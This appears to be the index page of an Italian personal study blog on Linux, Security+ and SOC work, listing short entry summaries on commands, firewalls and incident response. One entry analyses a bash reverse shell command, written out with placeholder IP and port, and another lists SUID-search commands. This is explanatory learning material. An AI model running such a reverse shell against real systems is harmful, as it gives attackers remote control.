System on u-random

iptables - Linux Packet Filtering

Thu, 04 Jun 2026 00:00:00 +0000

Firewall nativo del kernel Linux. Gestisce il traffico di rete tramite chain (INPUT, OUTPUT, FORWARD) e tabelle (filter, nat, mangle). UFW e nftables sono frontend/successori.

Cap 05 - Securing Hosts and Data

Fri, 29 May 2026 00:00:00 +0000

Sette superfici di attacco in un capitolo: virtualizzazione (VM Escape, VM Sprawl, container), hardening endpoint (TPM, HSM, UEFI Secure Boot, patch, baseline), protezione dati (at rest/transit/in use, DLP, FDE, database encryption), cloud (SaaS/PaaS/IaaS shared responsibility, CASB, SWG, IaC, SDN, edge/fog), mobile (BYOD/COPE/CYOD, MDM, jailbreak, sideloading), IoT e sistemi embedded (SoC, RTOS, vincoli), ICS/SCADA (CIA invertita, air-gap, Stuxnet). Cap 5 Gibson SY0-701.

Cap 3 - Network Technologies and Security Architecture

Mon, 18 May 2026 00:00:00 +0000

OSI model, protocolli base (TCP/UDP/IP/ICMP/ARP/DNS/DHCP/NTP), protocolli sicuri vs insicuri, SSL/TLS, firewall (stateless/stateful/WAF/NGFW), screened subnet, Zero Trust, proxy, NAT, VLAN, NAC, UTM, SASE, Group Policy, GDLP, SPF/DKIM/DMARC. Cap 3 Gibson SY0-701.

Bash Reverse Shell - Anatomia del comando

Sun, 10 May 2026 00:00:00 +0000

Analisi del comando bash -i >& /dev/tcp/IP/PORT 0>&1 - come funzionano i redirect di file descriptor e il pseudo-device /dev/tcp.

Kernel e Syscall - User Space vs Kernel Space

Sun, 10 May 2026 00:00:00 +0000

Il kernel è il nucleo del sistema operativo. Le syscall sono l'interfaccia tra programmi utente e kernel. Architetture diverse (ARM64, x86_64) hanno numeri di syscall diversi.

Operational Plans - DRP, IRP, BCP, Change Management

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra i piani operativi: Disaster Recovery Plan, Incident Response Plan, Business Continuity Plan e Change Management. Termini D4/D5 Security+ frequenti.

Risk Management - Termini chiave

Sun, 10 May 2026 00:00:00 +0000

Distinzione tra risk register, risk tolerance, risk transfer e risk analysis. Termini D5 Security+ che escono spesso nelle domande.

Glossario Inglese - Parole che scordo

Thu, 07 May 2026 00:00:00 +0000

Dizionario personale di termini inglesi tecnici e non che ricorrono nei testi Security+ e BTL1. Aggiornato durante le sessioni di ripasso.

iptables - Netfilter firewall Linux

Sun, 03 May 2026 00:00:00 +0000

Motore firewall del kernel Linux basato su Netfilter. Organizza le regole in chain (INPUT, OUTPUT, FORWARD). UFW è un frontend che traduce comandi semplici in regole iptables.

ufw - Uncomplicated Firewall

Sun, 03 May 2026 00:00:00 +0000

Frontend semplificato per iptables su Ubuntu/Debian. Gestisce regole firewall in entrata e uscita con comandi leggibili. Default policy: nega tutto il traffico in entrata quando abilitato.

file-descriptor

Thu, 23 Apr 2026 00:00:00 +0000

I tre canali standard aperti in ogni processo Unix: stdin (0), stdout (1), stderr (2). Fondamentali per capire pipe, redirezione e comportamento dei tool da terminale.

Architettura di Wazuh SIEM/XDR

Wed, 22 Apr 2026 00:00:00 +0000

Analisi dei componenti core di Wazuh: Agent, Manager, Indexer e Dashboard. Funzionamento del flusso di telemetria.

lsof - list open files

Wed, 22 Apr 2026 00:00:00 +0000

Elenca tutti i file aperti dal sistema. Fondamentale in incident response per trovare processi sospetti, connessioni anomale e file nascosti (deleted).

Rootkit - Il malware invisibile

Wed, 22 Apr 2026 00:00:00 +0000

Set di strumenti malevoli progettati per nascondere processi, file e connessioni di rete, spesso operando a livello di Kernel.

Glossario Cyber & SOC

Mon, 20 Apr 2026 00:00:00 +0000

Dizionario centrale degli acronimi e dei termini tecnici incontrati durante il percorso da Developer a SOC Specialist.

Investigazione Incidenti Linux - Cheat Sheet

Mon, 20 Apr 2026 00:00:00 +0000

Comandi essenziali per l'identificazione di anomalie, processi malevoli e connessioni sospette su sistemi UNIX/Linux.

Investigazione Incidenti Windows - Cheat Sheet

Mon, 20 Apr 2026 00:00:00 +0000

Comandi e strumenti essenziali per rilevare anomalie, persistenza e account sospetti in ambiente Windows.

/etc/network/interfaces - configurazione rete Debian/Kali

Thu, 16 Apr 2026 00:00:00 +0000

File di configurazione rete su Debian e derivate (Kali). Definisce interfacce, IP statico o DHCP, gateway. Letto all'avvio dal servizio networking.

Command Chaining e Grouping

Wed, 15 Apr 2026 00:00:00 +0000

Metodi per concatenare piu' comandi in un'unica riga di comando e gestire il flusso dell'output.

I Confini della Visibilità: Pubblico vs Privato

Wed, 15 Apr 2026 00:00:00 +0000

Analisi dei tre pilastri (Document Root, Permessi, Configurazione) che determinano cosa e' esposto sul web e come i container aggiungono un ulteriore strato di isolamento.

Alternative a man (Cheatsheet)

Sun, 12 Apr 2026 00:00:00 +0000

Panoramica delle risorse alternative ai manuali ufficiali (man) per consultare rapidamente esempi pratici di comandi CLI.

sysctl - configure kernel parameters at runtime

Thu, 09 Apr 2026 00:00:00 +0000

Legge e modifica parametri del kernel Linux a runtime senza riavviare. Usato per abilitare IP forwarding, disabilitare ICMP redirect, e configurare parametri di rete e sicurezza.

TCP vs UDP - Protocolli di Trasporto

Mon, 30 Mar 2026 00:00:00 +0000

TCP e UDP sono i due protocolli di trasporto al livello 4 dello stack OSI. TCP garantisce consegna ordinata con handshake e conferme. UDP e' senza connessione - veloce ma senza garanzie.

POSIX - Portable Operating System Interface

Sat, 28 Mar 2026 00:00:00 +0000

POSIX (Portable Operating System Interface) e' uno standard IEEE che definisce il comportamento di shell, comandi e chiamate di sistema su Unix-like. Garantisce portabilita' degli script tra bash, zsh, sh e dash.

Shebang - #!

Sat, 28 Mar 2026 00:00:00 +0000

Lo shebang (#!) e' la sequenza nei primi due byte di uno script che dice al kernel quale interprete usare. Senza shebang lo script viene eseguito dalla shell corrente - comportamento non portabile.

Shell - confronto e differenze

Sat, 28 Mar 2026 00:00:00 +0000

Le shell Unix sono interpreti di comandi che implementano POSIX come contratto minimo comune. sh e dash sono minimali e veloci, bash aggiunge estensioni comode, zsh aggiunge ancora di piu', fish rompe la compatibilita' POSIX per una sintassi piu' pulita.

Compressione e Archivi - gzip, bzip2, zip, tar

Fri, 27 Mar 2026 00:00:00 +0000

Guida unificata a gzip, bzip2, zip e tar su Linux. Copre compressione singoli file, archiviazione multi-file, formato tar.gz, e uso forense per analisi di archivi sospetti.

ip - show / manipulate routing and interfaces

Fri, 27 Mar 2026 00:00:00 +0000

Gestisce interfacce di rete, indirizzi IP e tabella di routing. Sostituisce ifconfig (deprecato) e route. Comando fondamentale per diagnosticare e configurare la rete su Linux moderno.

locate - find files by name (database search)

Fri, 27 Mar 2026 00:00:00 +0000

Cerca file nel filesystem tramite un database pre-costruito di pathname. Molto piu' veloce di find ma non trova file creati di recente — il database viene aggiornato di notte da updatedb.

rsync - remote file synchronization

Fri, 27 Mar 2026 00:00:00 +0000

Sincronizza file e directory localmente o via rete SSH. Trasferisce solo le differenze rispetto alla destinazione — efficiente per backup incrementali e sincronizzazione remota.

ss - socket statistics

Fri, 27 Mar 2026 00:00:00 +0000

Mostra socket aperti e connessioni di rete. Sostituisce netstat (deprecato) — piu' veloce perche' legge direttamente dal kernel invece di parsare /proc. Fondamentale in incident response per vedere chi e' connesso e chi ascolta.

touch - change file timestamps

Fri, 27 Mar 2026 00:00:00 +0000

Crea file vuoti o aggiorna i timestamp di file esistenti. Il nome viene da 'touch the timestamps'. Usato spesso per creare file segnaposto negli script.

traceroute - trace route to host

Fri, 27 Mar 2026 00:00:00 +0000

Mostra il percorso che i pacchetti compiono dalla macchina locale a un host remoto, hop per hop. Sfrutta il TTL per scoprire ogni router intermedio e misurare la latenza per tratto.

xargs - build and execute command lines from stdin

Fri, 27 Mar 2026 00:00:00 +0000

Converte stdin in argomenti per un comando. Permette di passare l'output di un comando come argomenti a un altro — fondamentale per costruire pipeline su grandi liste di file.

apropos - search man pages

Thu, 26 Mar 2026 00:00:00 +0000

Cerca una parola chiave nelle descrizioni di tutte le pagine di manuale. E' il Google interno di Linux — quando sai cosa vuoi fare ma non ricordi il nome del comando.

Bash Startup Files - file di avvio

Thu, 26 Mar 2026 00:00:00 +0000

I file di startup di bash determinano quali variabili, alias e funzioni vengono caricati all'avvio della shell. L'ordine di lettura dipende dal tipo di sessione: login shell o non-login shell.

dd - data duplicator (o disk destroyer)

Thu, 26 Mar 2026 00:00:00 +0000

Copia dati a basso livello direttamente tra dispositivi o file, blocco per blocco. Usato per clonare dischi, scrivere immagini su SD/USB, creare backup raw e acquisire immagini forensi.

lsblk - list block devices

Thu, 26 Mar 2026 00:00:00 +0000

Mostra l'albero dei dispositivi a blocchi — dischi, partizioni, LVM e relativi punti di mount. Comando moderno preferito a fdisk -l per una panoramica rapida della struttura del disco.

man - manual pages

Thu, 26 Mar 2026 00:00:00 +0000

Visualizza la documentazione ufficiale di comandi, file di configurazione, chiamate di sistema e librerie. Organizzato in 8 sezioni — sapere quale sezione cercare e' la chiave per trovare subito quello che serve.

mount / umount - mount filesystem

Thu, 26 Mar 2026 00:00:00 +0000

Aggancia un dispositivo di storage o filesystem a un punto dell'albero delle directory. Senza mount il dispositivo non e' accessibile. umount sgancia in modo sicuro prima di rimuovere fisicamente il device.

Offline. Non al buio.

Thu, 26 Mar 2026 00:00:00 +0000

TL;DR

apropos parola trova il comando quando non ne conosci il nome
comando --help ti dà i flag in cinque secondi senza uscire dal terminale
man comando è il manuale completo, navigabile con /parola per cercare
whatis comando ti dice in una riga cosa fa qualcosa che hai trovato nei log

▶ $ history

man ls
man 5 passwd
man -k password
man -f passwd
apropos permission
apropos -r "^ssh"
whatis find
tar --help
tar --help | grep extract

sha256sum - SHA-256 checksum

Thu, 26 Mar 2026 00:00:00 +0000

Calcola e verifica hash SHA-256 di file. Usato per verificare l'integrita' di download, immagini ISO, copie forensi e rilevare modifiche non autorizzate ai file.

journald - systemd-journald

Wed, 25 Mar 2026 00:00:00 +0000

systemd-journald e' il demone che raccoglie e indicizza tutti i log di sistema in un database binario strutturato. A differenza di auth.log, usa FSS per rendere le modifiche rilevabili. Si legge con journalctl.

PAM - Pluggable Authentication Modules

Wed, 25 Mar 2026 00:00:00 +0000

PAM (Pluggable Authentication Modules) e' il sistema di autenticazione modulare di Linux. Ogni servizio delega l'autenticazione a PAM che esegue una catena di moduli configurabili in /etc/pam.d/.

alias - create command alias

Tue, 24 Mar 2026 00:00:00 +0000

Crea scorciatoie per comandi lunghi o complessi. Gli alias temporanei durano solo la sessione corrente, quelli permanenti vanno in ~/.bashrc o ~/.zshrc.

export - export variable to environment

Tue, 24 Mar 2026 00:00:00 +0000

Esporta variabili shell nell'ambiente, rendendole visibili ai processi figli. Fondamentale per PATH, EDITOR e variabili di configurazione che devono essere ereditate.

jobs / fg / bg - gestione job shell

Tue, 24 Mar 2026 00:00:00 +0000

Gestione dei job in foreground e background nella shell. jobs elenca i processi sospesi o in background, fg li riporta in primo piano, bg li riprende senza occupare il terminale.

kill - send signal to process

Tue, 24 Mar 2026 00:00:00 +0000

Invia segnali ai processi tramite PID. SIGTERM chiede una chiusura pulita, SIGKILL forza la terminazione immediata senza possibilita' di essere ignorata.

Linux Processes - processi

Tue, 24 Mar 2026 00:00:00 +0000

Un processo e' un programma in esecuzione con PID univoco, spazio di memoria isolato e stato. Il kernel crea l'illusione del multitasking switching rapidamente tra processi in coda CPU.

netplan - network-defense configuration tool

Tue, 24 Mar 2026 00:00:00 +0000

Tool di configurazione di rete su Ubuntu moderno. Legge file YAML in /etc/netplan/ e genera la configurazione per il backend di rete. Usato per assegnare IP statici alle VM di laboratorio.

printenv - print environment

Tue, 24 Mar 2026 00:00:00 +0000

Mostra le variabili d'ambiente esportate, visibili ai processi figli. A differenza di set, non mostra variabili shell locali ne' funzioni bash.

ps - process status

Tue, 24 Mar 2026 00:00:00 +0000

Mostra uno snapshot dei processi in esecuzione con PID, utente, CPU e memoria. Fondamentale in incident response per identificare processi sospetti.

Shell Environment - ambiente shell

Tue, 24 Mar 2026 00:00:00 +0000

L'ambiente shell e' l'insieme di variabili d'ambiente ereditate dai processi figli. Distingue variabili locali (solo shell corrente) da variabili d'ambiente (esportate, visibili ai figli).

vim - Vi IMproved

Tue, 24 Mar 2026 00:00:00 +0000

Editor di testo modale a riga di comando. Tre modalita' principali: Normal (navigazione e comandi), Insert (scrittura), Visual (selezione). Presente su tutti i sistemi Unix — sapere aprire e chiudere un file e' requisito minimo.

Etc Directory Purpose

Mon, 23 Mar 2026 00:00:00 +0000

La directory /etc/ contiene i file di configurazione globali del sistema operativo. Include i database critici per la gestione di utenti, gruppi e privilegi.

history

Mon, 23 Mar 2026 00:00:00 +0000

Mostra la lista dei comandi eseguiti nella sessione corrente e in quelle precedenti. Permette di richiamare, cercare e riutilizzare comandi senza riscriverli.

su - substitute user

Mon, 23 Mar 2026 00:00:00 +0000

Esegue una shell come un altro utente. Con il flag - simula un login completo caricando l'ambiente dell'utente target. Lascia tracce diverse in auth.log rispetto a sudo.

sudo - superuser do

Mon, 23 Mar 2026 00:00:00 +0000

Esegue un singolo comando con i privilegi di un altro utente (default: root). A differenza di su, usa la password dell'utente corrente e ogni azione e' tracciata in auth.log.

User Management - gestione utenti e gruppi

Mon, 23 Mar 2026 00:00:00 +0000

Comandi per creare, modificare ed eliminare utenti e gruppi su Linux. Include adduser, usermod, userdel, groupadd, groupdel, passwd, chown, chgrp e lastlog.

Sun, 22 Mar 2026 00:00:00 +0000

Pager — mostra un file una schermata alla volta. Se il contenuto entra in una schermata esce subito. Se non entra va in modalità interattiva. Usato come vettore di escape in Bandit 25.

chmod - change mode

Thu, 19 Mar 2026 00:00:00 +0000

Modifica i permessi di accesso di file e directory. Supporta notazione ottale (stato finale esatto) e simbolica (modifica singolo bit). Fondamentale per il principio del minimo privilegio.

tmux

Thu, 19 Mar 2026 00:00:00 +0000

Terminal multiplexer — permette di avere piu finestre e pannelli in un solo terminale, e di lasciare sessioni attive in background anche dopo aver chiuso la connessione SSH.

Chi Sei per il Kernel

Wed, 18 Mar 2026 00:00:00 +0000

TL;DR

Linux non lavora con nomi utente - lavora con numeri: UID e GID
Ogni file ha tre livelli di permessi: owner, group, others
Il bit SUID cambia le regole: il processo gira con i privilegi del proprietario del file, non di chi lo esegue
find / -perm -4000 trova tutti i binari SUID del sistema - un'occhiata vale sempre

▶ $ history

id
ls -la /usr/bin/passwd
find / -perm -4000 -type f 2>/dev/null
chmod u+s /path/to/file
chmod u-s /path/to/file
find / -perm -4000 -type f 2>/dev/null | grep -v -E "^/(usr/bin|usr/sbin|bin|sbin|usr/lib)"

Linux non sa chi sei. Sa solo il tuo numero.

Find

Tue, 17 Mar 2026 00:00:00 +0000

Cerca file e directory nel filesystem in base a criteri specifici (nome, dimensione, permessi, utente). È uno strumento ricorsivo per natura, fondamentale per l'analisi del sistema e la ricerca di artefatti.

apt - gestione pacchetti Debian/Ubuntu